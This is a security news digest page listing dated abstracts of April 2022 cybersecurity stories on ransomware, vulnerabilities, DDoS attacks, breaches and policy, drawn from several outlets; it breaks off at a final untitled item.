Link Search Menu Expand Document
BSafes Library

April, 2022

April 30, 2022 – Ransomware

Fake Windows 10 updates infect you with Magniber ransomware Full Text

Abstract Fake Windows 10 updates on crack sites are being used to distribute the Magniber ransomware in a massive campaign that started earlier this month.

BleepingComputer

April 30, 2022 – Vulnerabilities

Microsoft Azure flaws could allow accessing PostgreSQL DBs of other customers Full Text

Abstract Researchers discovered flaws in the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region. Microsoft addressed a couple of vulnerabilities impacting the Azure Database for PostgreSQL...

Security Affairs

April 30, 2022 – Attack

Emotet tests new attack chain in low volume campaigns Full Text

Abstract Emotet operators are testing new attack techniques in response to Microsoft's move to disable Visual Basic for Applications (VBA) macros by default. The operators of the infamous Emotet botnet are testing new attack techniques in response to Microsoft's...

Security Affairs

April 30, 2022 – Denial Of Service

Pro-Russian group Killnet launched DDoS attacks on Romanian govt sites Full Text

Abstract A series of DDoS attacks launched by Russian hacktivists are targeting several Romanian government websites. The Romanian national cyber security and incident response team, DNSC, warns of a series of distributed denial-of-service (DDoS) attacks targeting...

Security Affairs

April 29, 2022 – Ransomware

The Week in Ransomware - April 29th 2022 - New operations emerge Full Text

Abstract This week we have discovered numerous new ransomware operations that have begun operating, with one appearing to be a rebrand of previous operations.

BleepingComputer

April 29, 2022 – Breach

Data breach at US healthcare provider ARcare impacts 345,000 individuals Full Text

Abstract Potentially exposed data included names, social security numbers, drivers’ license or state identification numbers, dates of birth, financial account information, and medical treatment information among other confidential information.

The Daily Swig

April 29, 2022 – Attack

Microsoft Documents Over 200 Cyberattacks by Russia Against Ukraine Full Text

Abstract At least six different Russia-aligned actors launched no less than 237 cyberattacks against Ukraine from February 23 to April 8, including 38 discrete destructive attacks that irrevocably destroyed files in hundreds of systems across dozens of organizations in the country. "Collectively, the cyber and kinetic actions work to disrupt or degrade Ukrainian government and military functions and undermine the public's trust in those same institutions," the company's Digital Security Unit (DSU)  said  in a special report. The major malware families that have been leveraged for destructive activity as part of Russia's relentless digital assaults include:  WhisperGate ,  HermeticWiper  ( FoxBlade  aka KillDisk),  HermeticRansom  (SonicVote),  IssacWiper  (Lasainraw),  CaddyWiper ,  DesertBlade ,  DoubleZero  (FiberLake), and  Industroyer2 . WhisperGate, HermeticWiper, IssacWiper, and CaddyWiper are all data wipers designed to overwrite data and render machines unboot

The Hacker News

April 29, 2022 – General

Cybersecurity and the ‘Good Cause’ Exception to the APA Full Text

Abstract In emergencies, federal agencies can avoid cumbersome rulemaking procedures. Uses of the “good cause” exception following 9/11 and the outbreak of the coronavirus offer insights relevant to the current cybersecurity threats to critical infrastructure.

Lawfare

April 29, 2022 – Attack

Anonymous hacked Russian PSCB Commercial Bank and companies in the energy sector Full Text

Abstract OpRussia continues, less than a week after my last update Anonymous has hacked other Russian companies and leaked their data via DDoSecrets. The #OpRussia launched by Anonymous on Russia after the criminal invasion of Ukraine continues, the collective...

Security Affairs

April 29, 2022 – Breach

Online library app Onleihe faces issues after cyberattack on provider Full Text

Abstract Library lending app Onleihe announced problems lending several media formats offered on the platform, like audio, video, and e-book files, after a cyberattack targeted their vendor.

BleepingComputer

April 29, 2022 – Vulnerabilities

Vulnerable plugins plague the CMS website security landscape Full Text

Abstract According to the report released by the researchers at Sucuri, vulnerable plugins and extensions "account for far more website compromises than out-of-date, core CMS files".

ZDNet

April 29, 2022 – Vulnerabilities

Hurry up, disable AFP on your QNAP NAS until the vendor fixes 8 bugs Full Text

Abstract QNAP urges customers to disable the AFP file service protocol on their NAS devices until it fixes critical Netatalk flaws. Taiwanese vendor QNAP is warning customers to disable the AFP file service protocol on their network-attached storage (NAS)...

Security Affairs

April 29, 2022 – General

Google gives 50% bonus to Android 13 Beta bug bounty hunters Full Text

Abstract Google has announced that all security researchers who report Android 13 Beta vulnerabilities through its Vulnerability Rewards Program (VRP) will get a 50% bonus on top of the standard reward until May 26th, 2022. 

BleepingComputer

April 29, 2022 – Ransomware

Expanding the Conti Ransomware IoCs Using WHOIS and IP Clues Full Text

Abstract A majority of the domain IoCs of Conti ransomware share the same lexical features in that they don’t seem to be English words and follow a succession of consonant-vowel patterns.

CircleID

April 29, 2022 – General

It’s Called BadUSB for a Reason Full Text

Abstract Cybercrime gang FIN7’s badUSB attacks serve as a reminder of two key vulnerabilities present among all organizations. The criminal group had been mailing malware-ridden USBs to various entities in the transport, insurance, and defense industries...

Security Affairs

April 29, 2022 – Government

India to require cybersecurity incident reporting within six hours Full Text

Abstract The Indian government has issued new directives requiring organizations to report cybersecurity incidents to CERT-IN within six hours, even if those incidents are port or vulnerability scans of computer systems.

BleepingComputer

April 29, 2022 – Phishing

Phishing Campaign Delivers Malware to Steals Passwords, Chat Logs, and Crypto Wallets Full Text

Abstract A mass phishing campaign is targeting Windows PCs and aims to deliver malware that can steal usernames, passwords, credit card details, and the contents of cryptocurrency wallets.

ZDNet

April 29, 2022 – Denial Of Service

Ongoing DDoS attacks from compromised sites hit Ukraine Full Text

Abstract Ukraine CERT-UA warns of ongoing DDoS attacks targeting pro-Ukraine sites and the government web portal. Ukraine 's computer emergency response team (CERT-UA) announced that it is investigating, along with the National Bank of Ukraine (CSIRT-NBU),...

Security Affairs

April 29, 2022 – Denial Of Service

Russian hacktivists launch DDoS attacks on Romanian govt sites Full Text

Abstract The Romanian national cyber security and incident response team, DNSC, has issued a statement about a series of distributed denial-of-service (DDoS) attacks targeting several public websites managed by the state entities.

BleepingComputer

April 29, 2022 – Vulnerabilities

Many Internet-Exposed Servers Affected by Exploited Redis Vulnerability Full Text

Abstract While Redis statically links the Lua Library, some Debian/Ubuntu packages dynamically link it, leading to a sandbox escape that can be exploited to achieve remote code execution.

Security Week

April 29, 2022 – Breach

More Than $13 Million Stolen From DeFi Platform Deus Finance Full Text

Abstract PeckShield said the attacker stole about $13.4 million worth of cryptocurrency but noted that the platform’s actual losses may be larger. CertiK put the losses at 5,446 ETH, or about $15.7 million.

The Record

April 29, 2022 – Vulnerabilities

Vulnerable plugins, Credit card skimming, SEO spam continue to be a menace: Report Full Text

Abstract Websites containing a recently vulnerable plugin or other extension are most likely to be caught up in malware campaigns. Default configurations of popular website software applications remain a serious liability, according to Sucuri.

Sucuri

April 29, 2022 – General

It’s Called BadUSB for a Reason Full Text

Abstract The ease with which one can purchase a rogue device, thanks to their accessibility and low cost, exacerbates the risk (many costing less than $100 on sites such as AliExpress).

April 28, 2022 – Breach

Attacker Breach ‘Dozens’ of GitHub Repos Using Stolen OAuth Tokens Full Text

Abstract GitHub shared the timeline of breaches in April 2022, this timeline encompasses the information related to when a threat actor gained access and stole private repositories belonging to dozens of organizations.

Threatpost

April 28, 2022 – Vulnerabilities

Microsoft Azure Vulnerability Exposes PostgreSQL Databases to Other Customers Full Text

Abstract Microsoft on Thursday disclosed that it addressed a pair of issues with the Azure Database for PostgreSQL Flexible Server that could result in unauthorized cross-account database access in a region. "By exploiting an elevated permissions bug in the Flexible Server authentication process for a replication user, a malicious user could leverage an improperly anchored regular expression to bypass authentication to gain access to other customers' databases," Microsoft Security Response Center (MSRC)  said . New York City-based cloud security company Wiz, which uncovered the flaws, dubbed the exploit chain " ExtraReplica ." Microsoft said it mitigated the bug within 48 hours of disclosure on January 13, 2022. Specifically, it relates to a case of privilege escalation in the Azure PostgreSQL engine to gain code execution and a cross-account authentication bypass by means of a forged certificate, allowing an attacker to create a database in the target's Azure r

The Hacker News

April 28, 2022 – Government

Indian Govt Orders Organizations to Report Security Breaches Within 6 Hours to CERT-In Full Text

Abstract India's computer and emergency response team, CERT-In, on Thursday published new guidelines that require service providers, intermediaries, data centers, and government entities to compulsorily report cybersecurity incidents, including data breaches, within six hours. "Any service provider, intermediary, data center, body corporate and Government organization shall mandatorily report cyber incidents [...] to CERT-In within six hours of noticing such incidents or being brought to notice about such incidents," the government  said  in a release. The types of incidents that come under the ambit include, inter alia, compromise of critical systems, targeting scanning, unauthorized access to computers and social media accounts, website defacements, malware deployments, identity theft, DDoS attacks, data breaches and leaks, rogue mobile apps, and attacks against servers and network appliances like routers and IoT devices. The government said it was taking these steps to ens

The Hacker News

April 28, 2022 – Malware

EmoCheck now detects new 64-bit versions of Emotet malware Full Text

Abstract The Japan CERT has released a new version of their EmoCheck utility to detect new 64-bit versions of the Emotet malware that began infecting users this month.

BleepingComputer

April 28, 2022 – Ransomware

Quantum Ransomware Stuns Researchers with Blazing Fast Attack Speed Full Text

Abstract According to the DFIR Report, Quantum ransomware has upped its encryption game as it now encrypts systems within a few hours of penetration within a network. Rapid attacks are concerning as they offer less time for analysts to defend their systems.

Cyware Alerts - Hacker News

April 28, 2022 – Hacker

Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group Full Text

Abstract A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities. Calling  TA410  an umbrella group comprised of three teams dubbed FlowingFrog, LookingFrog and JollyFrog, Slovak cybersecurity firm ESET  assessed  that "these subgroups operate somewhat independently, but that they may share intelligence requirements, an access team that runs their spear-phishing campaigns, and also the team that deploys network infrastructure." TA410 — said to share behavioral and tooling overlaps with  APT10  (aka Stone Panda or TA429) — has a history of targeting U.S-based organizations in the utilities sector as well as diplomatic entities in the Middle East and Africa. Other identified victims of the hacker collective include a manufacturing company in Japan, a mining business in India, and a charity in Isra

The Hacker News

April 28, 2022 – Criminals

Bumblebee, a new malware loader used by multiple crimeware threat actors Full Text

Abstract Threat actors have replaced the BazaLoader and IcedID malware with a new loader called Bumblebee in their campaigns. Cybercriminal groups that were previously using the BazaLoader and IcedID as part of their malware campaigns seem to have adopted...

Security Affairs

April 28, 2022 – Vulnerabilities

Synology warns of critical Netatalk bugs in multiple products Full Text

Abstract Synology has warned customers that some of its network-attached storage (NAS) appliances are exposed to attacks exploiting multiple critical Netatalk vulnerabilities.

BleepingComputer

April 28, 2022 – APT

North Korean APT37 Targets Journalists with GoldBackdoor Full Text

Abstract APT37, suspected to have ties with the North Korean government, was found targeting journalists with sophisticated info-stealer malware dubbed Goldbackdoor. The emails sent to the journalists included a link to download ZIP archives with LNK files. Targets are advised to ensure they don’t open any ... Read More

Cyware Alerts - Hacker News

April 28, 2022 – Education

Everything you need to know to create a Vulnerability Assessment Report Full Text

Abstract You've been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be "What is that?" Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from.  As it's likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn't a moment to waste. So let's drive straight in. What is a Vulnerability Assessment Report and why do you need one? A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation's vulnerabilities. It's important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers.  A best security practi

The Hacker News

April 28, 2022 – Government

CISA published 2021 Top 15 most exploited software vulnerabilities Full Text

Abstract Cybersecurity and Infrastructure Security Agency (CISA) published a list of 2021's top 15 most exploited software vulnerabilities Cybersecurity and Infrastructure Security Agency (CISA) published the list of 2021's top 15 most exploited software vulnerabilities This...

Security Affairs

April 28, 2022 – Vulnerabilities

Microsoft fixes ExtraReplica Azure bugs that exposed user databases Full Text

Abstract Microsoft has addressed a chain of critical vulnerabilities found in the Azure Database for PostgreSQL Flexible Server that could let malicious users escalate privileges and gain access to other customers' databases after bypassing authentication.

BleepingComputer

April 28, 2022 – Attack

Hundreds of Cyberattacks Launched on Ukraine - Microsoft Report Full Text

Abstract Right before the invasion, at least six Russian distinct actors launched more than 237 attacks. All of these attacks were of destructive nature and many are still ongoing. 

Cyware Alerts - Hacker News

April 28, 2022 – Criminals

Cybercriminals Using New Malware Loader ‘Bumblebee’ in the Wild Full Text

Abstract Cybercriminal actors previously observed delivering BazaLoader and IcedID as part of their malware campaigns are said to have transitioned to a new loader called Bumblebee that's under active development. "Based on the timing of its appearance in the threat landscape and use by multiple cybercriminal groups, it is likely Bumblebee is, if not a direct replacement for BazaLoader, then a new, multifunctional tool used by actors that historically favored other malware," enterprise security firm Proofpoint  said  in a report shared with The Hacker News. Campaigns distributing the new highly sophisticated loader are said to have commenced in March 2022, while sharing overlaps with malicious activity leading to the deployment of Conti and Diavol ransomware, raising the possibility that the loader could act as a precursor for ransomware attacks. "Threat actors using Bumblebee are associated with malware payloads that have been linked to follow-on ransomware campaigns,&q

The Hacker News

April 28, 2022 – Denial Of Service

CloudFlare blocked a record HTTPs DDoS attack peaking at 15 rps Full Text

Abstract Cloudflare has mitigated a distributed denial-of-service (DDoS) attack that peaked at 15.3 million request-per-second (RPS). Cloudflare announced to have mitigated a distributed denial-of-service (DDoS) attack that peaked at 15.3 million request-per-second...

Security Affairs

April 28, 2022 – Breach

Medical software firm fined €1.5M for leaking data of 490k patients Full Text

Abstract The French data protection authority (CNIL) fined medical software vendor Dedalus Biology with EUR 1.5 million for violating three articles of the GDPR (General Data Protection Regulation).

BleepingComputer

April 28, 2022 – Denial Of Service

Multi-Vector DDoS Attacks Surge Full Text

Abstract According to Kaspersky, there has been a 46% rise in the number of attacks. The U.S. accounted for the most number of targets at 45.01%, followed by China (9.34%) and Germany (4.95%).

Cyware Alerts - Hacker News

April 28, 2022 – Privacy

Twitter’s New Owner Elon Musk Wants DMs to be End-to-End Encrypted like Signal Full Text

Abstract Elon Musk, CEO of SpaceX and Tesla and Twitter's new owner, on Thursday called on adding support for end-to-end encryption (E2EE) to the platform's direct messages ( DM ) feature. "Twitter DMs should have end to end encryption like Signal, so no one can spy on or hack your messages," Musk  said  in a tweet. The statement comes days after the microblogging service  announced  it officially entered into an agreement to be acquired by an entity wholly owned by Elon Musk, with the transaction valued at approximately US$ 44 billion, or US$ 54.20 per share in cash.  The deal, which is expected to be closed over the next six months, will see it becoming a privately held company. "Free speech is the bedrock of a functioning democracy, and Twitter is the digital town square where matters vital to the future of humanity are debated," Musk said in a statement. "I also want to make Twitter better than ever by enhancing the product with new features, making t

The Hacker News

April 28, 2022 – Attack

Russia-linked threat actors launched hundreds of cyberattacks on Ukraine Full Text

Abstract Microsoft revealed that Russia launched hundreds of cyberattacks against Ukraine since the beginning of the invasion. Microsoft states that at least six separate Russia-linked threat actors launched more than 237 operations against Ukraine starting...

Security Affairs

April 28, 2022 – Denial Of Service

Ukraine targeted by DDoS attacks from compromised WordPress sites Full Text

Abstract Ukraine's computer emergency response team (CERT-UA) has published an announcement warning of ongoing DDoS (distributed denial of service) attacks targeting pro-Ukraine sites and the government web portal.

BleepingComputer

April 28, 2022 – Phishing

Cybercriminals deliver IRS tax scams and phishing campaigns by mimicking government vendors Full Text

Abstract Cybercriminals purposely choose specific times when all of us are busy with taxes, and preparing for holidays (e.g., Easter), that’s why you need to be especially careful during these times.

Help Net Security

April 28, 2022 – Malware

New RIG Exploit Kit Campaign Infecting Victims’ PCs with RedLine Stealer Full Text

Abstract A new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan. "When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server," Bitdefender  said  in a new report shared with The Hacker News. Most of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others. Exploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware. The primary infection method used by attackers to distribute exploit kits, in this case the

The Hacker News

April 28, 2022 – Education

How to Attack Your Own Company’s Service Desk to spot risks Full Text

Abstract Specops Secure Service Desk is an excellent tool for keeping a help desk safe from social engineering attacks. Although Specops Secure Service Desk offers numerous features, there are three capabilities that are especially useful for thwarting social engineering attacks.

BleepingComputer

April 28, 2022 – Business

Veza Raises $110M in Funding Full Text

Abstract Backers included Accel, Bain Capital, Ballistic Ventures, GV, Norwest Venture Partners, and True Ventures, as well as Kevin Mandia, Enrique Salem, Lane Bess, Manoj Apte, Joe Montana, Niels Provos, and Karthik Rangarajan, and many more.

FinSMEs

April 28, 2022 – Malware

New Bumblebee malware replaces Conti’s BazarLoader in cyberattacks Full Text

Abstract A newly discovered malware loader called Bumblebee is likely the latest development of the Conti syndicate, designed to replace the BazarLoader backdoor used to deliver ransomware payloads.

BleepingComputer

April 28, 2022 – Ransomware

Detecting Ransomware’s Stealthy Boot Configuration Edits Full Text

Abstract The hypothesis used by researchers is that threat actors don’t necessarily have to use bcdedit to modify bootloader configurations but could implement code that directly modifies the Windows registry keys that determine those configurations.

Binary Defense

April 28, 2022 – Vulnerabilities

NPM flaw let attackers add anyone as maintainer to malicious packages Full Text

Abstract A logical flaw in the npm registry, dubbed 'package planting' let authors of malicious packages quietly add anyone and any number of users as 'maintainers' to their packages in an attempt to boost the trust in their package.

BleepingComputer

April 28, 2022 – Denial Of Service

Cloudflare detects one of the largest DDoS attacks on record targeting crypto platform Full Text

Abstract According to Cloudflare, the attack, which lasted less than 15 seconds, was launched from a botnet of approximately 6,000 unique bots and originated from 112 countries around the world.

The Record

April 28, 2022 – General

Ransom payment is roughly 15% of the total cost of ransomware attacks Full Text

Abstract Researchers analyzing the collateral consequences of a ransomware attack include costs that are roughly seven times higher than the ransom demanded by the threat actors.

BleepingComputer

April 28, 2022 – Outage

Austin Peay State University resumes after ransomware cyber attack Full Text

Abstract Austin Peay State University (APSU) confirmed yesterday that it had been a victim of a ransomware attack. The university, located in Clarksville, Tennessee advised students, staff, and faculty to disconnect their computers and devices from the university network immediately as a precaution.

BleepingComputer

April 27, 2022 – Vulnerabilities

U.S Cybersecurity Agency Lists 2021’s Top 15 Most Exploited Software Vulnerabilities Full Text

Abstract Log4Shell ,  ProxyShell ,  ProxyLogon ,  ZeroLogon , and flaws in  Zoho ManageEngine AD SelfService Plus ,  Atlassian Confluence , and  VMware vSphere Client  emerged as some of the top exploited security vulnerabilities in 2021. That's according to a " Top Routinely Exploited Vulnerabilities " report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S. Other frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ( CVE-2020-0688 ), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ( CVE-2019-11510 ), and a path traversal defect in Fortinet FortiOS and FortiProxy ( CVE-2018-13379 ). Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws. "G

The Hacker News

April 27, 2022 – Attack

Cloudflare Thwarts Record DDoS Attack Peaking at 15 Million Requests Per Second Full Text

Abstract Cloudflare on Wednesday disclosed that it acted to mitigate a 15.3 million request-per-second (RPS) distributed denial-of-service (DDoS) attack. The web infrastructure and website security company called it one of the "largest HTTPS DDoS attacks on record."  "HTTPS DDoS attacks are more expensive in terms of required computational resources because of the higher cost of establishing a secure TLS encrypted connection," Cloudflare's Omer Yoachimik and Julien Desgats  said . "Therefore it costs the attacker more to launch the attack, and for the victim to mitigate it." The volumetric DDoS attack is said to have lasted less than 15 seconds and targeted an unnamed Cloudflare customer operating a crypto launchpad.  Volumetric DDoS attacks are designed to overwhelm a target network/service with significantly high volumes of malicious traffic, which typically originate from a botnet under a threat actor's control. Cloudflare said the latest attack w

The Hacker News

April 27, 2022 – Ransomware

Beware: Onyx ransomware destroys files instead of encrypting them Full Text

Abstract A new Onyx ransomware operation is destroying large files instead of encrypting them, preventing those files from being decrypted even if a ransom is paid.

BleepingComputer

April 27, 2022 – Ransomware

PSA: Onyx ransomware destroys large files instead of encrypting them Full Text

Abstract A new Onyx ransomware operation is destroying large files instead of encrypting them, preventing those files from being decrypted even if a ransom is paid.

BleepingComputer

April 27, 2022 – Breach

Student grades stored in Greek education platform UniverSIS could be manipulated via SQLi Full Text

Abstract A SQL injection (SQLi) vulnerability in UniverSIS, an open-source platform developed by Greek universities to manage student data, left academic grades at risk of manipulation.

The Daily Swig

April 27, 2022 – Education

[eBook] Your First 90 Days as MSSP: 10 Steps to Success Full Text

Abstract Bad actors continuously evolve their tactics and are becoming more sophisticated. Within the past couple of years, we've seen supply chain attacks that quickly create widespread damage throughout entire industries. But the attackers aren't just focusing their efforts on supply chains. For example, businesses are becoming increasingly more reliant on SaaS apps and the cloud – creating a new avenue for attackers to steal critical data and assets. The looming threat of ransomware attacks, phishing scams, and destructive BEC campaigns has businesses wondering: do I need to increase my security? As a result, many managed service providers (MSP) are fielding questions about the level of security they can provide for their customers. In this new environment, MSPs are finding they can no longer avoid offering cybersecurity services. Fortunately,  there's an eBook  for MSPs who are expanding into the security space as managed security service providers (MSSP).  It's vital for MSPs to have a

The Hacker News

April 27, 2022 – Government

US Department of State offers $10M reward for info to locate six Russian Sandworm members Full Text

Abstract The U.S. government offers up to $10 million for info that allows to identify or locate six Russian GRU hackers who are members of the Sandworm APT group. The US Department of State is offering up to $10 million for info that allows to identify or locate...

Security Affairs

April 27, 2022 – Breach

New Black Basta ransomware springs into action with a dozen breaches Full Text

Abstract A new ransomware gang known as Black Basta has quickly catapulted into operation this month, claiming to have breached over twelve companies in just a few weeks.

BleepingComputer

April 27, 2022 – Criminals

Ransomware demands are growing, but life is getting tougher for malware gangs Full Text

Abstract Victims of ransomware attacks are paying higher ransoms than ever before, but there are signs that organizations are starting to take heed of cybersecurity advice, making them more resilient to cybercriminals.

ZDNet

April 27, 2022 – Attack

Chinese Hackers Targeting Russian Military Personnel with Updated PlugX Malware Full Text

Abstract A China-linked government-sponsored threat actor observed striking European diplomatic entities in March may have been targeting Russian government officials with an updated version of a remote access trojan called  PlugX . Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG. "The war in Ukraine has prompted many countries to deploy their cyber capabilities to gain insight about global events, political machinations, and motivations," the cybersecurity firm  said  in a report shared with The Hacker News. "This desire for situational awareness often extends to collecting intelligence from allies and 'friends.'" Bronze President, active since at least July 2018, has a history of conducting espionage operations by leveraging custom and publicly available tools to compromise, maintain long-term access,

The Hacker News

April 27, 2022 – Vulnerabilities

Linux Nimbuspwn flaws could allow attackers to deploy sophisticated threats Full Text

Abstract Microsoft disclosed two Linux privilege escalation flaws, collectively named Nimbuspwn, that could allow conducting various malicious activities. The Microsoft 365 Defender Research Team has discovered two Linux privilege escalation flaws (tracked...

Security Affairs

April 27, 2022 – Breach

GitHub: How stolen OAuth tokens helped breach dozens of orgs Full Text

Abstract GitHub has shared a timeline of this month's security breach when a threat actor gained access to and stole private repositories belonging to dozens of organizations.

BleepingComputer

April 27, 2022 – Vulnerabilities

Chrome 101 Patches 30 Vulnerabilities Full Text

Abstract Google this week announced that Chrome 101 was released to the stable channel with 30 security fixes inside, including 25 for vulnerabilities identified by external security researchers.

Security Week

April 27, 2022 – Privacy

Google’s New Safety Section Shows What Data Android Apps Collect About Users Full Text

Abstract Google on Tuesday officially began rolling out a new "Data safety" section for Android apps on the Play Store to highlight the type of data being collected and shared with third-parties. "Users want to know for what purpose their data is being collected and whether the developer is sharing user data with third parties," Suzanne Frey, Vice President of product for Android security and privacy,  said . "In addition, users want to understand how app developers are securing user data after an app is downloaded." The transparency measure, which is built along the lines of Apple's " Privacy Nutrition Labels ," was  first announced  by Google nearly a year ago in May 2021. The Data safety section, which will show up against every app listing on the digital storefront, presents a unified view of what data is being collected, for what purpose it's being used, and how it's handled, while also highlighting what data is being shared with thi

The Hacker News

April 27, 2022 – Attack

Wind Turbine giant Deutsche Windtechnik hit by a professional Cyberattack Full Text

Abstract The German wind turbine giant Deutsche Windtechnik was hit by a targeted cyberattack earlier this month. German wind turbine giant Deutsche Windtechnik announced that some of its systems were hit by a targeted professional cyberattack earlier this...

Security Affairs

April 27, 2022 – Vulnerabilities

QNAP warns users to disable AFP until it fixes critical bugs Full Text

Abstract Taiwanese corporation QNAP has asked customers this week to disable the AFP file service protocol on their network-attached storage (NAS) appliances until it fixes multiple critical Netatalk vulnerabilities.

BleepingComputer

April 27, 2022 – Malware

Package Planting: Are You Unknowingly Maintaining Poisoned Packages? Full Text

Abstract Aqua’s Team Nautilus found a logical flaw in npm that allows threat actors to masquerade a malicious package as legitimate and trick unsuspecting developers into installing it.

Aquasec

April 27, 2022 – Hacker

U.S. Offers $10 Million Bounty for Information on 6 Russian Military Hackers Full Text

Abstract The U.S. government on Tuesday  announced  up to $10 million in rewards for information on six hackers associated with the Russian military intelligence service. "These individuals participated in malicious cyber activities on behalf of the Russian government against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act," the State Department's Rewards for Justice Program  said . All the six Russian officers are members of an advanced persistent threat group called Sandworm (aka Voodoo Bear or Iron Viking), which is known to be operating since at least 2008 with a specific focus on targeting entities in Ukraine with the goal of establishing an illicit, long-term presence in order to mine highly sensitive data. The hackers, who are officers of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation ( GRU ), are as follows - Artem Valeryevich Ochichenko , who has been linked to technical reconnaissa

The Hacker News

April 27, 2022 – Criminals

Conti ransomware operations surge despite the recent leak Full Text

Abstract Conti ransomware gang continues to target organizations worldwide despite the massive data leak has shed light on its operations. Researchers from Secureworks state that the Conti ransomware gang, tracked as a Russia-based threat actor Gold Ulrick,...

Security Affairs

April 27, 2022 – Attack

Microsoft says Russia hit Ukraine with hundreds of cyberattacks Full Text

Abstract Microsoft has revealed the true scale of Russian-backed cyberattacks against Ukraine since the invasion, with hundreds of attempts from multiple Russian hacking groups targeting the country's infrastructure and Ukrainian citizens.

BleepingComputer

April 27, 2022 – Attack

German Wind Turbine Firm Hit by ‘Targeted, Professional Cyberattack’ Full Text

Abstract German wind turbine giant Deutsche Windtechnik has issued a notification to warn that some of its IT systems were impacted in a targeted professional cyberattack earlier this month.

Security Week

April 27, 2022 – Phishing

Russian govt impersonators target telcos in phishing attacks Full Text

Abstract A previously unknown and financially motivated hacking group is impersonating a Russian agency in a phishing campaign targeting entities in Eastern European countries.

BleepingComputer

April 27, 2022 – Business

ARMO Raises $30 Million for Open Source Kubernetes Security Platform Full Text

Abstract The latest investment, which brings ARMO’s total funding to date to $34.5 million, was led by Tiger Global and Hyperwise Ventures, with participation from existing investors Pitango First and Peled Ventures.

Security Week

April 27, 2022 – Vulnerabilities

Cybersecurity agencies reveal top exploited vulnerabilities of 2021 Full Text

Abstract In partnership with the NSA and the FBI, cybersecurity authorities worldwide have released today a list of the top 15 vulnerabilities routinely exploited by threat actors during 2021.

BleepingComputer

April 27, 2022 – Breach

Illinois-based doctor’s group reports data breach affecting patients’ personal, financial data Full Text

Abstract Illinois Gastroenterology Group, based in Gurnee with offices throughout the Chicago area, said they recently experienced a security breach that left their patients’ private data and financial information exposed.

Lake & Mchenry County Scanner

April 27, 2022 – Malware

RIG Exploit Kit drops RedLine malware via Internet Explorer bug Full Text

Abstract Threat analysts have uncovered yet another large-scale campaign delivering the RedLine stealer malware onto worldwide targets.

BleepingComputer

April 27, 2022 – Hacker

Chinese state-backed hackers now target Russian state officers Full Text

Abstract Security researchers analyzing a phishing campaign targeting Russian officials found evidence that points to the China-based threat actor tracked as Mustang Panda (also known as HoneyMyte and Bronze President).

BleepingComputer

April 27, 2022 – General

Redis, MongoDB, and Elastic: 2022’s top exposed databases Full Text

Abstract Security researchers have noticed an increase in the number of databases publicly exposed to the Internet, with 308,000 identified in 2021. The growth continued quarter over quarter, peaking in the first months of this year.

BleepingComputer

April 27, 2022 – Vulnerabilities

New Nimbuspwn Linux vulnerability gives hackers root privileges Full Text

Abstract A new set of vulnerabilities collectively tracked as Nimbuspwn could let local attackers escalate privileges on Linux systems to deploy malware ranging from backdoors to ransomware.

BleepingComputer

April 26, 2022 – Vulnerabilities

NPM Bug Allowed Attackers to Distribute Malware as Legitimate Packages Full Text

Abstract A "logical flaw" has been disclosed in NPM, the default package manager for the Node.js JavaScript runtime environment, that enables malicious actors to pass off rogue libraries as legitimate and trick unsuspecting developers into installing them. The supply chain threat has been dubbed "Package Planting" by researchers from cloud security firm Aqua. Following responsible disclosure on February 10, the underlying issue was remediated by NPM on April 26. "Up until recently, NPM allowed adding anyone as a maintainer of the package without notifying these users or getting their consent," Aqua's Yakir Kadkoda  said  in a report published Tuesday. This effectively meant that an adversary could create malware-laced packages and assign them to trusted, popular maintainers without their knowledge. The idea here is to add credible owners associated with other popular NPM libraries to the attacker-controlled poisoned package in hopes that doing so would a

The Hacker News

April 26, 2022 – Vulnerabilities

Microsoft Discovers New Privilege Escalation Flaws in Linux Operating System Full Text

Abstract Microsoft on Tuesday disclosed a set of two privilege escalation vulnerabilities in the Linux operating system that could potentially allow threat actors to carry out an array of nefarious activities. Collectively called " Nimbuspwn ," the flaws "can be chained together to gain root privileges on Linux systems, allowing attackers to deploy payloads, like a root backdoor, and perform other malicious actions via arbitrary root code execution," Jonathan Bar Or of the Microsoft 365 Defender Research Team  said  in a report. On top of that, the defects — tracked as  CVE-2022-29799 and CVE-2022-29800  — could also be weaponized as a vector for root access to deploy more sophisticated threats such as ransomware. The vulnerabilities are rooted in a  systemd  component called  networkd-dispatcher , a  daemon program  for the network manager system service that's designed to dispatch network status changes. Specifically, they relate to a combination of  directory t

The Hacker News

April 26, 2022 – Government

US offers $10 million reward for tips on Russian Sandworm hackers Full Text

Abstract The U.S. is offering up to $10 million to identify or locate six Russian GRU hackers who are part of the notorious Sandworm hacking group.

BleepingComputer

April 26, 2022 – Hacker

TeamTNT has Updated its Attack Tactics Full Text

